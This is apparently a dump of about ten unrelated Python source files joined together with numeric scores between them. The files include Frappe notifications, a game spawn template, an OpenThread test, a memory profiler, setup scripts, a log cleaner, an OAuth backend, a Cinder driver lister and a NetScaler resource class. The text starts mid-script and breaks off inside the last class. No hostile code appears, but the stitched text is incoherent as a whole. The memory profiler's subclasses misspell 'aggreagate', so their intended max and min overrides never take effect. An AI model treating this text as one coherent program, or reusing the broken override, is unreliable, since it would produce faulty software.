wait for termination process.waitFor() # get result + exit status print "Process isTerminated() III =",process.isTerminated() print "Process exit value =",process.getExitValue() print "--- Process standard out ---\n",process.getStdout() print "---" print "--- Process standard error ---\n",process.getStderr() print "---" print "End."
0.035847
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import time_diff_in_seconds, now, now_datetime, DATETIME_FORMAT from dateutil.relativedelta import relativedelta @frappe.whitelist() def get_notifications(): if frappe.flags.in_install: return config = get_notification_config() groups = config.get("for_doctype").keys() + config.get("for_module").keys() cache = frappe.cache() notification_count = {} for name in groups: count = cache.hget("notification_count:" + name, frappe.session.user) if count is not None: notification_count[name] = count return { "open_count_doctype": get_notifications_for_doctypes(config, notification_count), "open_count_module": get_notifications_for_modules(config, notification_count), "open_count_other": get_notifications_for_other(config, notification_count), "new_messages": get_new_messages() } def get_new_messages(): last_update = frappe.cache().hget("notifications_last_update", frappe.session.user) now_timestamp = now() frappe.cache().hset("notifications_last_update", frappe.session.user, now_timestamp) if not last_update: return [] if last_update and time_diff_in_seconds(now_timestamp, last_update) > 1800: # no update for 30 mins, consider only the last 30 mins last_update = (now_datetime() - relativedelta(seconds=1800)).strftime(DATETIME_FORMAT) return frappe.db.sql("""select sender_full_name, content from `tabCommunication` where communication_type in ('Chat', 'Notification') and reference_doctype='user' and reference_name = %s and creation > %s order by creation desc""", (frappe.session.user, last_update), as_dict=1) def get_notifications_for_modules(config, notification_count): """Notifications for modules""" return get_notifications_for("for_module", config, notification_count) def get_notifications_for_other(config, notification_count): """Notifications for other items""" return get_notifications_for("for_other", config, notification_count) def get_notifications_for(notification_type, config, notification_count): open_count = {} notification_map = config.get(notification_type) or {} for m in notification_map: try: if m in notification_count: open_count[m] = notification_count[m] else: open_count[m] = frappe.get_attr(notification_map[m])() frappe.cache().hset("notification_count:" + m, frappe.session.user, open_count[m]) except frappe.PermissionError: pass # frappe.msgprint("Permission Error in notifications for {0}".format(m)) return open_count def get_notifications_for_doctypes(config, notification_count): """Notifications for DocTypes""" can_read = frappe.get_user().get_can_read() open_count_doctype = {} for d in config.for_doctype: if d in can_read: condition = config.for_doctype[d] if d in notification_count: open_count_doctype[d] = notification_count[d] else: try: if isinstance(condition, dict): result = len(frappe.get_list(d, fields=["name"], filters=condition, limit_page_length = 21, as_list=True, ignore_ifnull=True)) else: result = frappe.get_attr(condition)() except frappe.PermissionError: pass # frappe.msgprint("Permission Error in notifications for {0}".format(d)) except Exception, e: # OperationalError: (1412, 'Table definition has changed, please retry transaction') if e.args[0]!=1412: raise else: open_count_doctype[d] = result frappe.cache().hset("notification_count:" + d, frappe.session.user, result) return open_count_doctype def clear_notifications(user="*"): if user=="*": frappe.cache().delete_keys("notification_count:") else: # delete count for user frappe.cache().hdel_keys("notification_count:", user) def delete_notification_count_for(doctype): frappe.cache().delete_key("notification_count:" + doctype) def clear_doctype_notifications(doc, method=None, *args, **kwargs): config = get_notification_config() doctype = doc.doctype if doctype in config.for_doctype: delete_notification_count_for(doctype) return if doctype in config.for_module_doctypes: delete_notification_count_for(config.for_module_doctypes[doctype]) def get_notification_info_for_boot(): out = get_notifications() config = get_notification_config() can_read = frappe.get_user().get_can_read() conditions = {} module_doctypes = {} doctype_info = dict(frappe.db.sql("""select name, module from tabDocType""")) for d in list(set(can_read + config.for_doctype.keys())): if d in config.for_doctype: conditions[d] = config.for_doctype[d] if d in doctype_info: module_doctypes.setdefault(doctype_info[d], []).append(d) out.update({ "conditions": conditions, "module_doctypes": module_doctypes, }) return out def get_notification_config(): def _get(): config = frappe._dict() for notification_config in frappe.get_hooks().notification_config: nc = frappe.get_attr(notification_config)() for key in ("for_doctype", "for_module", "for_module_doctypes", "for_other"): config.setdefault(key, {}) config[key].update(nc.get(key, {})) return config return frappe.cache().get_value("notification_config", _get) def get_filters_for(doctype): '''get open filters for doctype''' config = get_notification_config() return config.get('for_doctype').get(doctype, {}) @frappe.whitelist() def get_open_count(doctype, name): '''Get open count for given transactions and filters :param doctype: Reference DocType :param name: Reference Name :param transactions: List of transactions (json/dict) :param filters: optional filters (json/list)''' frappe.has_permission(doc=frappe.get_doc(doctype, name), throw=True) meta = frappe.get_meta(doctype) links = meta.get_dashboard_data() # compile all items in a list items = [] for group in links.transactions: items.extend(group.get('items')) out = [] for d in items: filters = get_filters_for(d) fieldname = links.get('non_standard_fieldnames', {}).get(d, links.fieldname) data = {'name': d} if filters: # get the fieldname for the current document # we only need open documents related to the current document filters[fieldname] = name total = len(frappe.get_all(d, fields='name', filters=filters, limit=6, distinct=True, ignore_ifnull=True)) data['open_count'] = total total = len(frappe.get_all(d, fields='name', filters={fieldname: name}, limit=10, distinct=True, ignore_ifnull=True)) data['count'] = total out.append(data) out = { 'count': out, } module = frappe.get_meta_module(doctype) if hasattr(module, 'get_timeline_data'): out['timeline_data'] = module.get_timeline_data(doctype, name) return out
0.026633
import sys from services.spawn import MobileTemplate from services.spawn import WeaponTemplate from resources.datatables import WeaponType from resources.datatables import Difficulty from resources.datatables import Options from java.util import Vector def addTemplate(core): mobileTemplate = MobileTemplate() mobileTemplate.setCreatureName('panshee_warrior') mobileTemplate.setLevel(71) mobileTemplate.setDifficulty(Difficulty.NORMAL) mobileTemplate.setMinSpawnDistance(3) mobileTemplate.setMaxSpawnDistance(5) mobileTemplate.setDeathblow(False) mobileTemplate.setScale(1) mobileTemplate.setSocialGroup('panshee tribe') mobileTemplate.setAssistRange(1) mobileTemplate.setOptionsBitmask(128) mobileTemplate.setStalker(True) templates = Vector() templates.add('object/mobile/shared_dressed_ewok_f_01.iff') templates.add('object/mobile/shared_dressed_ewok_f_02.iff') templates.add('object/mobile/shared_dressed_ewok_f_03.iff') templates.add('object/mobile/shared_dressed_ewok_f_04.iff') templates.add('object/mobile/shared_dressed_ewok_f_05.iff') templates.add('object/mobile/shared_dressed_ewok_f_06.iff') templates.add('object/mobile/shared_dressed_ewok_f_07.iff') templates.add('object/mobile/shared_dressed_ewok_f_08.iff') templates.add('object/mobile/shared_dressed_ewok_f_09.iff') templates.add('object/mobile/shared_dressed_ewok_f_10.iff') templates.add('object/mobile/shared_dressed_ewok_f_11.iff') templates.add('object/mobile/shared_dressed_ewok_f_12.iff') templates.add('object/mobile/shared_dressed_ewok_m_01.iff') templates.add('object/mobile/shared_dressed_ewok_m_02.iff') templates.add('object/mobile/shared_dressed_ewok_m_03.iff') templates.add('object/mobile/shared_dressed_ewok_m_04.iff') templates.add('object/mobile/shared_dressed_ewok_m_05.iff') templates.add('object/mobile/shared_dressed_ewok_m_06.iff') templates.add('object/mobile/shared_dressed_ewok_m_07.iff') templates.add('object/mobile/shared_dressed_ewok_m_08.iff') templates.add('object/mobile/shared_dressed_ewok_m_09.iff') templates.add('object/mobile/shared_dressed_ewok_m_10.iff') templates.add('object/mobile/shared_dressed_ewok_m_11.iff') templates.add('object/mobile/shared_dressed_ewok_m_12.iff') mobileTemplate.setTemplates(templates) weaponTemplates = Vector() weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic') weaponTemplates.add(weapontemplate) mobileTemplate.setWeaponTemplateVector(weaponTemplates) attacks = Vector() mobileTemplate.setDefaultAttack('meleeHit') mobileTemplate.setAttacks(attacks) lootPoolNames_1 = ['Junk'] lootPoolChances_1 = [100] lootGroupChance_1 = 65 mobileTemplate.addToLootGroups(lootPoolNames_1,lootPoolChances_1,lootGroupChance_1) lootPoolNames_2 = ['random_loot_primitives'] lootPoolChances_2 = [100] lootGroupChance_2 = 35 mobileTemplate.addToLootGroups(lootPoolNames_2,lootPoolChances_2,lootGroupChance_2) core.spawnService.addMobileTemplate('panshee_warrior', mobileTemplate) return
0.026156
#!/usr/bin/env python # # Copyright (c) 2016, The OpenThread Authors. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # 1. Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # 3. Neither the name of the copyright holder nor the # names of its contributors may be used to endorse or promote products # derived from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # import unittest from autothreadharness.harness_case import HarnessCase class Leader_5_3_7(HarnessCase): role = HarnessCase.ROLE_LEADER case = '5 3 7' golden_devices_required = 5 def on_dialog(self, dialog, title): pass if __name__ == '__main__': unittest.main()
0
"""Memory profiler powered by memory_profiler.""" from __future__ import division from __future__ import absolute_import from __future__ import print_function from __future__ import unicode_literals import functools import memory_profiler import six from ..interfaces import profiler from . import base class BaseMemoryProfiler(base.SubprocessProfiler): """Base memory profiler using memory_profiler.""" @classmethod def aggregate(cls, results): """Return the last results.""" return results[-1] @property def baseline(self): """Get the memory usage of the process without running code.""" func = functools.partial( memory_profiler.memory_usage, (six.exec_, ('pass', globals(), locals()), {}), ) functools.update_wrapper(func, memory_profiler.memory_usage) results = self.delegate(func) return sum(results) / len(results) def profile(self, setup, code): """Execute the code using the timeit profiler.""" results = memory_profiler.memory_usage( (six.exec_, (setup + '\n' + code, globals(), locals()), {}), ) return profiler.ProfileResult( value=self.__class__.aggregate(results) - self.baseline, unit='megabytes', ) class MaxMemoryProfiler(BaseMemoryProfiler): """Memory profiler that returns the highest measured memory usage.""" aggreagate = max class MinMemoryProfiler(BaseMemoryProfiler): """Memory profiler that returns the lowest measured memory usage.""" aggreagate = min class AvgMemoryProfiler(BaseMemoryProfiler): """Memory profiler that returns the average measured memory usage.""" @classmethod def aggreagate(cls, results): """Get the average of the results.""" return sum(results) / len(results)
0
""" GitHub-Flask ------------ Adds support to authorize users with GitHub and make API requests with Flask. Links ````` * `documentation <http://github-flask.readthedocs.org>`_ * `development version <http://github.com/cenkalti/github-flask/zipball/master#egg=GitHub-Flask-dev>`_ """ import os import re from setuptools import setup def read(*fname): path = os.path.join(os.path.dirname(__file__), *fname) with open(path) as f: return f.read() def get_version(): for line in read('flask_github.py').splitlines(): m = re.match(r"__version__\s*=\s'(.*)'", line) if m: return m.groups()[0].strip() raise Exception('Cannot find version') setup( name='GitHub-Flask', version=get_version(), url='http://github.com/cenkalti/github-flask', license='MIT', author='Cenk Alti', author_email='cenkalti@gmail.com', description='GitHub extension for Flask microframework', long_description=__doc__, py_modules=['flask_github'], test_suite='test_flask_github', zip_safe=False, include_package_data=True, platforms='any', install_requires=[ 'Flask', 'requests', ], tests_require=['mock'], classifiers=[ 'Environment :: Web Environment', 'Intended Audience :: Developers', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Topic :: Internet :: WWW/HTTP :: Dynamic Content', 'Topic :: Software Development :: Libraries :: Python Modules' ] )
0
# # Paasmaker - Platform as a Service # # This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # import os import glob import uuid import time import logging import paasmaker from base import BasePeriodic, BasePeriodicTest import colander class LogsCleanerConfigurationSchema(colander.MappingSchema): max_age = colander.SchemaNode(colander.Integer(), title="Maximum log age", description="Maximum age for a log file. After this age, it is deleted. In seconds. Default 7 days.", default=86400 * 7, missing=86400 * 7) class LogsCleaner(BasePeriodic): """ A plugin to remove log files once they reach a certain age. """ OPTIONS_SCHEMA = LogsCleanerConfigurationSchema() API_VERSION = "0.9.0" def on_interval(self, callback, error_callback): # Start by making a list of directories at the top level. self.paths = glob.glob(os.path.join(self.configuration.get_flat('log_directory'), '*')) # Process them one by one. self.callback = callback self.error_callback = error_callback self.removed_files = 0 self.older_than = int(time.time()) - self.options['max_age'] self.logger.info("Starting cleanup process.") self._fetch_directory() def _fetch_directory(self): try: this_dir = self.paths.pop() self._process_directory(this_dir) except IndexError, ex: # No more to process. self.logger.info("Completed cleanup process. Removed %d log files.", self.removed_files) self.callback("Removed %d log files." % self.removed_files) def _process_directory(self, path): self.directory_contents = glob.glob( os.path.join(path, '*.log') ) self._fetch_file() def _fetch_file(self): try: this_file = self.directory_contents.pop() information = os.stat(this_file) if information.st_mtime < self.older_than: # This file should be removed. # Check the file size. If it's over a 1MB # delete it using a subprocess and rm. Why? # Because unlink() will block, and on large # log files and certain filesystems, this # could hang up the process for a while. if information.st_size > 1024 * 1024: self.logger.info("Removing %s via subprocess", this_file) def on_rm_finished(code): # Move onto the next file. self.removed_files += 1 self.configuration.io_loop.add_callback(self._fetch_file) # TODO: This won't work on Windows. process = paasmaker.util.popen.Popen( ['rm', this_file], io_loop=self.configuration.io_loop, on_exit=on_rm_finished ) else: self.logger.info("Removing %s", this_file) os.unlink(this_file) self.removed_files += 1 # Process the next file on the IO loop. self.configuration.io_loop.add_callback(self._fetch_file) else: # Nope. Move on. self.configuration.io_loop.add_callback(self._fetch_file) except IndexError, ex: # No more to process. self.configuration.io_loop.add_callback(self._fetch_directory) def _handle_file(self, file): self.configuration.io_loop.add_callback(self._fetch_file) class LogsCleanerTest(BasePeriodicTest): def setUp(self): super(LogsCleanerTest, self).setUp() self.configuration.plugins.register( 'paasmaker.periodic.logs', 'paasmaker.common.periodic.logs.LogsCleaner', {}, 'Log Cleanup Plugin' ) self.logger = logging.getLogger('job') # Prevent propagation to the parent. This prevents extra messages # during unit tests. self.logger.propagate = False # Clean out all handlers. Otherwise multiple tests fail. self.logger.handlers = [] paasmaker.util.joblogging.JobLoggerAdapter.setup_joblogger(self.configuration) def test_simple(self): # Create a few sample log files. for i in range(10): job_id = str(uuid.uuid4()) job_logger = self.configuration.get_job_logger(job_id) job_logger.error("Test") job_logger.finished() # Make one big log file. job_id = str(uuid.uuid4()) job_logger = self.configuration.get_job_logger(job_id) test_string = "test" * 1024 for i in range(1024): job_logger.error(test_string) job_logger.finished() plugin = self.configuration.plugins.instantiate( 'paasmaker.periodic.logs', paasmaker.util.plugin.MODE.PERIODIC ) # This should remove nothing. plugin.on_interval(self.success_callback, self.failure_callback) self.wait() self.assertTrue(self.success) self.assertIn(" 0 ", self.message, "Wrong message returned.") # Adjust all the log files so that they are older than the threshold. expected_age = time.time() - (86400 * 8) for log_file in glob.glob(os.path.join(self.configuration.get_flat('log_directory'), '*', '*.log')): os.utime(log_file, (expected_age, expected_age)) # Now clean. plugin.on_interval(self.success_callback, self.failure_callback) self.wait() self.assertTrue(self.success) self.assertIn(" 11 ", self.message, "Wrong message returned.")
0.026216
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import webnotes, os, subprocess, tempfile, json, datetime @webnotes.whitelist() def get(): with open("../app/home/page/latest_updates/latest_updates.json", "r") as lufile: return json.loads(lufile.read()) def make(): def add_to_logs(out, repo): out.seek(0) last_commit = None for l in out.readlines(): l = l.decode('utf-8') if last_commit is not None: if l.startswith("Date:"): last_commit["date"] = l[8:-1] last_commit["datetime"] = datetime.datetime.strptime(last_commit["date"][:-6], "%a %b %d %H:%M:%S %Y") if l.startswith("Author:"): last_commit["author"] = l[8:-1] if l.startswith(" "): last_commit["message"] = l[4:-1] if l.startswith("commit"): last_commit = { "repo": repo, "commit": l.split(" ")[1][:-1] } logs.append(last_commit) os.chdir("lib") logs = [] out_lib = tempfile.TemporaryFile() subprocess.call("git --no-pager log -n 200 --no-color", shell=True, stdout=out_lib) add_to_logs(out_lib, "lib") os.chdir("../app") out_app = tempfile.TemporaryFile() subprocess.call("git --no-pager log -n 200 --no-color", shell=True, stdout=out_app) add_to_logs(out_app, "app") logs.sort(key=lambda a: a["datetime"], reverse=True) for a in logs: del a["datetime"] for i in xrange(len(logs)): if i and logs[i]["message"]==logs[i-1]["message"]: logs[i]["delete"] = True if logs[i]["message"].startswith("Merge branch") or "[" not in logs[i]["message"]: logs[i]["delete"] = True logs = filter(lambda a: a if not a.get("delete") else None, logs) os.chdir("..") with open("app/home/page/latest_updates/latest_updates.json", "w") as lufile: lufile.write(json.dumps(logs, indent=1, sort_keys=True)) if __name__=="__main__": make()
0.035677
from urllib import urlencode import six from requests_oauthlib import OAuth1 from .oauth import BaseOAuth2 class NKOAuth2(BaseOAuth2): """NK OAuth authentication backend""" name = 'nk' AUTHORIZATION_URL = 'https://nk.pl/oauth2/login' ACCESS_TOKEN_URL = 'https://nk.pl/oauth2/token' SCOPE_SEPARATOR = ',' ACCESS_TOKEN_METHOD = 'POST' SIGNATURE_TYPE_AUTH_HEADER = 'AUTH_HEADER' EXTRA_DATA = [ ('id', 'id'), ] def get_user_details(self, response): """Return user details from NK account""" entry = response['entry'] return { 'username': entry.get('displayName'), 'email': entry['emails'][0]['value'], 'first_name': entry.get('displayName').split(' ')[0], 'id': entry.get('id') } def auth_complete_params(self, state=None): client_id, client_secret = self.get_key_and_secret() return { 'grant_type': 'authorization_code', # request auth code 'code': self.data.get('code', ''), # server response code 'client_id': client_id, 'client_secret': client_secret, 'redirect_uri': self.get_redirect_uri(state), 'scope': self.get_scope_argument() } def get_user_id(self, details, response): """Return a unique ID for the current user, by default from server response.""" return details.get(self.ID_KEY) def user_data(self, access_token, *args, **kwargs): """Loads user data from service""" url = 'http://opensocial.nk-net.pl/v09/social/rest/people/@me?' + \ urlencode({ 'nk_token': access_token, 'fields': 'name,surname,avatar,localization,age,' + 'gender,emails,birthdate' }) return self.get_json( url, auth=self.oauth_auth(access_token) ) def oauth_auth(self, token=None, oauth_verifier=None, signature_type=SIGNATURE_TYPE_AUTH_HEADER): key, secret = self.get_key_and_secret() oauth_verifier = oauth_verifier or self.data.get('oauth_verifier') token = token or {} # decoding='utf-8' produces errors with python-requests on Python3 # since the final URL will be of type bytes decoding = None if six.PY3 else 'utf-8' state = self.get_or_create_state() return OAuth1(key, secret, resource_owner_key=None, resource_owner_secret=None, callback_uri=self.get_redirect_uri(state), verifier=oauth_verifier, signature_type=signature_type, decoding=decoding)
0
#! /usr/bin/env python # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Generate list of Cinder drivers""" import argparse import os import json from cinder.interface import util from cinder import objects # Object loading can cause issues loading drivers, force it up front objects.register_all() parser = argparse.ArgumentParser(prog="generate_driver_list") parser.add_argument("--format", default='str', choices=['str', 'dict'], help="Output format type") # Keep backwards compatibilty with the gate-docs test # The tests pass ['docs'] on the cmdln, but it's never been used. parser.add_argument("output_list", default=None, nargs='?') CI_WIKI_ROOT = "https://wiki.openstack.org/wiki/ThirdPartySystems/" class Output(object): def __init__(self, base_dir, output_list): # At this point we don't care what was passed in, just a trigger # to write this out to the doc tree for now self.driver_file = None if output_list: self.driver_file = open( '%s/doc/source/drivers.rst' % base_dir, 'w+') self.driver_file.write('===================\n') self.driver_file.write('Available Drivers\n') self.driver_file.write('===================\n\n') def __enter__(self): return self def __exit__(self, type, value, traceback): if self.driver_file: self.driver_file.close() def write(self, text): if self.driver_file: self.driver_file.write('%s\n' % text) else: print(text) def format_description(desc, output): desc = desc or '<None>' lines = desc.rstrip('\n').split('\n') for line in lines: output.write(' %s' % line) def print_drivers(drivers, config_name, output): for driver in sorted(drivers, key=lambda x: x.class_fqn): driver_name = driver.class_name if not driver.supported: driver_name += " (unsupported)" output.write(driver_name) output.write('-' * len(driver_name)) if driver.version: output.write('* Version: %s' % driver.version) output.write('* %s=%s' % (config_name, driver.class_fqn)) if driver.ci_wiki_name and 'Cinder_Jenkins' not in driver.ci_wiki_name: output.write('* CI info: %s%s' % (CI_WIKI_ROOT, driver.ci_wiki_name)) output.write('* Description:') format_description(driver.desc, output) output.write('') output.write('') def output_str(cinder_root, args): with Output(cinder_root, args.output_list) as output: output.write('Volume Drivers') output.write('==============') print_drivers(util.get_volume_drivers(), 'volume_driver', output) output.write('Backup Drivers') output.write('==============') print_drivers(util.get_backup_drivers(), 'backup_driver', output) output.write('FC Zone Manager Drivers') output.write('=======================') print_drivers(util.get_fczm_drivers(), 'zone_driver', output) def collect_driver_info(driver): """Build the dictionary that describes this driver.""" info = {'name': driver.class_name, 'version': driver.version, 'fqn': driver.class_fqn, 'description': driver.desc, 'ci_wiki_name': driver.ci_wiki_name, 'supported': driver.supported} return info def output_dict(): """Output the results as a JSON dict.""" driver_list = [] drivers = util.get_volume_drivers() for driver in drivers: driver_list.append(collect_driver_info(driver)) print(json.dumps(driver_list)) def main(): tools_dir = os.path.dirname(os.path.abspath(__file__)) cinder_root = os.path.dirname(tools_dir) cur_dir = os.getcwd() os.chdir(cinder_root) args = parser.parse_args() try: if args.format == 'str': output_str(cinder_root, args) elif args.format == 'dict': output_dict() finally: os.chdir(cur_dir) if __name__ == '__main__': main()
0
# # Copyright (c) 2008-2015 Citrix Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License") # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response from nssrc.com.citrix.netscaler.nitro.service.options import options from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util class feoaction(base_resource) : """ Configuration for Front end optimization action resource. """ def __init__(self) : self._name = "" self._pageextendcache = False self._imgshrinktoattrib = False self._imggiftopng = False self._imginline = False self._cssimginline = False self._jpgoptimize = False self._imglazyload = False self._cssminify = False self._cssinline = False self._csscombine = False self._convertimporttolink = False self._jsminify = False self._jsinline = False self._htmlminify = False self._cssmovetohead = False self._jsmovetoend = False self._domainsharding = "" self._dnsshards = [] self._clientsidemeasurements = False self._imgadddimensions = False self._imgshrinkformobile = False self._imgweaken = False self._jpgprogressive = False self._cssflattenimports = False self._jscombine = False self._htmlrmdefaultattribs = False self._htmlrmattribquotes = False self._htmltrimurls = False self._hits = 0 self._undefhits = 0 self._builtin = [] self.___count = 0 @property def name(self) : """The name of the front end optimization action.<br/>Minimum length = 1. """ try : return self._name except Exception as e: raise e @name.setter def name(self, name) : """The name of the front end optimization action.<br/>Minimum length = 1 """ try : self._name = name except Exception as e: raise e @property def pageextendcache(self) : """Extend the time period during which the browser can use the cached resource. """ try : return self._pageextendcache except Exception as e: raise e @pageextendcache.setter def pageextendcache(self, pageextendcache) : """Extend the time period during which the browser can use the cached resource. """ try : self._pageextendcache = pageextendcache except Exception as e: raise e @property def imgshrinktoattrib(self) : """Shrink image dimensions as per the height and width attributes specified in the <img> tag. """ try : return self._imgshrinktoattrib except Exception as e: raise e @imgshrinktoattrib.setter def imgshrinktoattrib(self, imgshrinktoattrib) : """Shrink image dimensions as per the height and width attributes specified in the <img> tag. """ try : self._imgshrinktoattrib = imgshrinktoattrib except Exception as e: raise e @property def imggiftopng(self) : """Convert GIF image formats to PNG formats. """ try : return self._imggiftopng except Exception as e: raise e @imggiftopng.setter def imggiftopng(self, imggiftopng) : """Convert GIF image formats to PNG formats. """ try : self._imggiftopng = imggiftopng except Exception as e: raise e @property def imginline(self) : """Inline images whose size is less than 2KB. """ try : return self._imginline except Exception as e: raise e @imginline.setter def imginline(self, imginline) : """Inline images whose size is less than 2KB. """ try : self._imginline = imginline except Exception as e: raise e @property def cssimginline(self) : """Inline small images (less than 2KB) referred within CSS files as background-URLs. """ try : return self._cssimginline except Exception as e: raise e @cssimginline.setter def cssimginline(self, cssimginline) : """Inline small images (less than 2KB) referred within CSS files as background-URLs. """ try : self._cssimginline = cssimginline except Exception as e: raise e @property def jpgoptimize(self) : """Remove non-image data such as comments from JPEG images. """ try : return self._jpgoptimize except Exception as e: raise e @jpgoptimize.setter def jpgoptimize(self, jpgoptimize) : """Remove non-image data such as comments from JPEG images. """ try : self._jpgoptimize = jpgoptimize except Exception as e: raise e @property def imglazyload(self) : """Download images, only when the user scrolls the page to view them. """ try : return self._imglazyload except Exception as e: raise e @imglazyload.setter def imglazyload(self, imglazyload) : """Download images, only when the user scrolls the page to view them. """ try : self._imglazyload = imglazyload except Exception as e: raise e @property def cssminify(self) : """Remove comments and whitespaces from CSSs. """ try : return self._cssminify except Exception as e: raise e @cssminify.setter def cssminify(self, cssminify) : """Remove comments and whitespaces from CSSs. """ try : self._cssminify = cssminify except Exception as e: raise e @property def cssinline(self) : """Inline CSS files, whose size is less than 2KB, within the main page. """ try : return self._cssinline except Exception as e: raise e @cssinline.setter def cssinline(self, cssinline) : """Inline CSS files, whose size is less than 2KB, within the main page. """ try : self._cssinline = cssinline except Exception as e: raise e @property def csscombine(self) : """Combine one or more CSS files into one file. """ try : return self._csscombine except Exception as e: raise e @csscombine.setter def csscombine(self, csscombine) : """Combine one or more CSS files into one file. """ try : self._csscombine = csscombine except Exception as e: raise e @property def convertimporttolink(self) : """Convert CSS import statements to HTML link tags. """ try : return self._convertimporttolink except Exception as e: raise e @convertimporttolink.setter def convertimporttolink(self, convertimporttolink) : """Convert CSS import statements to HTML link tags. """ try : self._convertimporttolink = convertimporttolink except Exception as e: raise e @property def jsminify(self) : """Remove comments and whitespaces from JavaScript. """ try : return self._jsminify except Exception as e: raise e @jsminify.setter def jsminify(self, jsminify) : """Remove comments and whitespaces from JavaScript. """ try : self._jsminify = jsminify except Exception as e: raise e @property def jsinline(self) : """Convert linked JavaScript files (less than 2KB) to inline JavaScript files. """ try : return self._jsinline except Exception as e: raise e @jsinline.setter def jsinline(self, jsinline) : """Convert linked JavaScript files (less than 2KB) to inline JavaScript files. """ try : self._jsinline = jsinline except Exception as e: raise e @property def htmlminify(self) : """Remove comments and whitespaces from an HTML page. """ try : return self._htmlminify except Exception as e: raise e @htmlminify.setter def htmlminify(self, htmlminify) : """Remove comments and whitespaces from an HTML page. """ try : self._htmlminify = htmlminify except Exception as e: raise e @property def cssmovetohead(self) : """Move any CSS file present within the body tag of an HTML page to the head tag. """ try : return self._cssmovetohead except Exception as e: raise e @cssmovetohead.setter def cssmovetohead(self, cssmovetohead) : """Move any CSS file present within the body tag of an HTML page to the head tag. """ try : self._cssmovetohead = cssmovetohead except Exception as e: raise e @property def jsmovetoend(self) : """Move any JavaScript present in the body tag to the end of the body tag. """ try : return self._jsmovetoend except Exception as e: raise e @jsmovetoend.setter def jsmovetoend(self, jsmovetoend) : """Move any JavaScript present in the body tag to the end of the body tag. """ try : self._jsmovetoend = jsmovetoend except Exception as e: raise e @property def domainsharding(self) : """Domain name of the server. """ try : return self._domainsharding except Exception as e: raise e @domainsharding.setter def domainsharding(self, domainsharding) : """Domain name of the server. """ try : self._domainsharding = domainsharding except Exception as e: raise e @property def dnsshards(self) : """Set of domain names that replaces the parent domain. """ try : return self._dnsshards except Exception as e: raise e @dnsshards.setter def dnsshards(self, dnsshards) : """Set of domain names that replaces the parent domain. """ try : self._dnsshards = dnsshards except Exception as e: raise e @property def clientsidemeasurements(self) : """Collect the amount of time required for the client to load and render the web page. """ try : return self._clientsidemeasurements except Exception as e: raise e @clientsidemeasurements.setter def clientsidemeasurements(self, clientsidemeasurements) : """Collect the amount of time required for the client to load and render the web page. """ try : self._clientsidemeasurements = clientsidemeasurements except Exception as e: raise e @property def imgadddimensions(self) : """Add dimension attributes to images, if not specified within the <img> tag. """ try : return self._imgadddimensions except Exception as e: raise e @property def imgshrinkformobile(self) : """Serve smaller images for mobile users. """ try : return self._imgshrinkformobile except Exception as e: raise e @property def imgweaken(self) : """Reduce the image quality. """ try : return self._imgweaken except Exception as e: raise e @property def jpgprogressive(self) : """Convert JPEG image formats to progressive formats. """ try : return self._jpgprogressive except Exception as e: raise e @property def cssflattenimports(self) : """Replace CSS import statements with the file content. """ try : return self._cssflattenimports except Exception as e: raise e @property def jscombine(self) : """Combine one or more JavaScript files into one file. """ try : return self._jscombine except Exception as e: raise e @property def htmlrmdefaultattribs(self) : """Remove default redundant attributes from an HTML file. """ try : return self._htmlrmdefaultattribs except Exception as e: raise e @property def htmlrmattribquotes(self) : """Remove unnecessary quotes present within the HTML attributes. """ try : return self._htmlrmattribquotes except Exception as e: raise e @property def htmltrimurls(self) : """Trim URLs. """ try : return self._htmltrimurls except Exception as e: raise e @property def hits(self) : """The number of times the action has been taken. """ try : return self._hits except Exception as e: raise e @property def undefhits(self) : """Total number of undefined policy hits. """ try : return self._undefhits except Exception as e: raise e @property def builtin(self) : 